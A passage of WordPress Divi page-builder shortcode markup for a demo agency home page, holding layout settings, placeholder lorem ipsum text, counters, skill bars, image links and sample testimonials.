hover_enabled=\"0\"][et_pb_row admin_label=\"Video\" _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"4%\" animation_starting_opacity=\"100%\" box_shadow_style=\"preset1\" box_shadow_blur=\"77px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_video src=\"https://www.youtube.com/watch?v=f47r43eO6BU\" image_src=\"//i.ytimg.com/vi/f47r43eO6BU/hqdefault.jpg\" _builder_version=\"4.5.2\" animation_direction=\"bottom\" hover_enabled=\"0\" box_shadow_style=\"preset5\" box_shadow_vertical=\"0px\" box_shadow_spread=\"20px\" box_shadow_color=\"#ffffff\" thumbnail_overlay_color=\"rgba(0,0,0,0.6)\"][/et_pb_video][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Fun Fact Section\" _builder_version=\"4.5.2\" background_color=\"#d4b068\" custom_margin=\"|||\" custom_padding=\"60px||110px|\" hover_enabled=\"0\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Generating New Ideas. Solving Big Problems</h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" admin_label=\"Fun Fact\" _builder_version=\"3.25\" custom_margin=\"|||\" custom_padding=\"40px||40px|\" animation_style=\"zoom\" animation_direction=\"top\" animation_intensity_zoom=\"10%\"][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Projects\" number=\"200\" percent_sign=\"off\" _builder_version=\"3.0.83\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Satisfied Clients\" number=\"54\" percent_sign=\"off\" _builder_version=\"3.0.83\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"100ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Ongoing Projects\" number=\"12\" percent_sign=\"off\" _builder_version=\"3.0.83\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"200ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Cups Of Coffee\" number=\"906\" percent_sign=\"off\" _builder_version=\"3.0.83\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"300ms\"][/et_pb_number_counter][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Feature Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"109px||110px|\"][et_pb_row column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" gutter_width=\"4\" admin_label=\"Feature\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"3.25\" width=\"86%\" width_tablet=\"80%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"86%\" max_width_tablet=\"80%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_padding=\"40px||40px|\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/home-office-07-1.png\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"8%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"7%||7%|\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2>Why we are different</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<p>Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make point of using a type specimen book.</p>[/et_pb_text][et_pb_button button_url=\"#\" button_text=\"Learn More\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Latest Work Section\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" custom_padding=\"110px||5px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Latest Work</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"0px\" admin_label=\"Work Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_padding=\"0px|5%|0px|5%\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/home-office-02.jpg\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/home-office-03.jpg\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/home-office-05.jpg\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/home-office-04-1.jpg\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Button Section\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" custom_padding=\"0px||90px|\"][et_pb_row _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_button button_url=\"#\" button_text=\"See More\" button_alignment=\"center\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Skill Section\" _builder_version=\"3.22\" custom_padding=\"110px||110px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Skills</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Skill\" _builder_version=\"3.25\" custom_padding=\"20px||10px|\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"flip\" animation_intensity_flip=\"20%\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It is a long established fact that a reader. It was popularised in the 1960s with the release.\r[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_counters bar_bg_color=\"#fcd21d\" use_percentages=\"off\" _builder_version=\"3.0.87\" title_font=\"Montserrat|||on|||||\" title_text_color=\"#353740\" title_font_size=\"12px\" title_letter_spacing=\"1px\" title_line_height=\"2em\" percent_font_size=\"1px\" custom_padding=\"|||\" animation_style=\"fold\" animation_direction=\"left\" animation_intensity_fold=\"30%\"][et_pb_counter percent=\"90\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#fcd21d\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Branding - 90%\r[/et_pb_counter][et_pb_counter percent=\"77\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#fcd21d\" use_percentages=\"off\" allow_player_pause_default=\"off\"]UX Research - 77%\r[/et_pb_counter][et_pb_counter percent=\"85%\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#fcd21d\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Interface Design - 85%\r[/et_pb_counter][/et_pb_counters][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Gradient Background Color Section\" _builder_version=\"3.22\" background_color_gradient_direction=\"90deg\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/background-split-03-1.jpg\" custom_margin=\"||78px|\" custom_margin_tablet=\"||0px|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"10%||0px|\"][et_pb_row _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/MB-purefront-02.png\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" custom_margin=\"||-56px|\" custom_margin_tablet=\"||10%|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"left\" animation_duration=\"1500ms\" animation_intensity_slide=\"10%\" animation_starting_opacity=\"100%\" locked=\"off\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Quote Section\" _builder_version=\"3.22\" custom_margin=\"40px||50px|\"][et_pb_row admin_label=\"Quote\" _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Quote\" _builder_version=\"3.27.4\" text_text_color=\"#747d88\" text_font_size=\"24px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"flip\" animation_direction=\"top\" animation_intensity_flip=\"20%\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever.\r[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"140px\" padding_top_2=\"0px\" padding_left_1=\"10%\" admin_label=\"Feature Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_margin=\"|||\" custom_padding=\"0px|||\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"100px\" box_shadow_color=\"#ffffff\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_left__hover=\"10%\" padding_top__hover=\"140px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Feature Titile\" _builder_version=\"3.25\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"||10px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2>Award winning Design</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<p><span>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Maecenas metus sapien, tempus nec lectus vitae, varius porttitor turpis. Ut sit amet tincidunt nulla, nec ultrices est. Aliquam sollicitudin tempor dui, ac accumsan metus vulputate sit amet. Donec placerat rutrum tellus et.</span></p>[/et_pb_text][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"3.25\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"|||\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Product\" use_icon=\"on\" font_icon=\"%%65%%\" icon_color=\"#fcd21d\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"3.0.83\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation_style=\"fade\" animation_direction=\"bottom\"][/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Branding\" use_icon=\"on\" font_icon=\"%%369%%\" icon_color=\"#fcd21d\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"3.0.82\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"][/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/home-office-06.jpg\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"6%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Testimonial Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"110px||110px|\"][et_pb_row admin_label=\"Testimonial Title\" _builder_version=\"3.25\" custom_margin=\"|||\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat|on||on|\" text_text_color=\"#353740\" text_font_size=\"42px\" text_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\"]<p>From Our Clients</p>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"600px\" module_alignment=\"center\" custom_margin=\"|||\"]Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Testimonial\" _builder_version=\"3.25\" custom_padding=\"|||\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Mitch Skolnik\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_1.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Andrel Nahaev\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_3.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Eduard Ungureanu\" job_title=\"Tech Support\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_2.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" 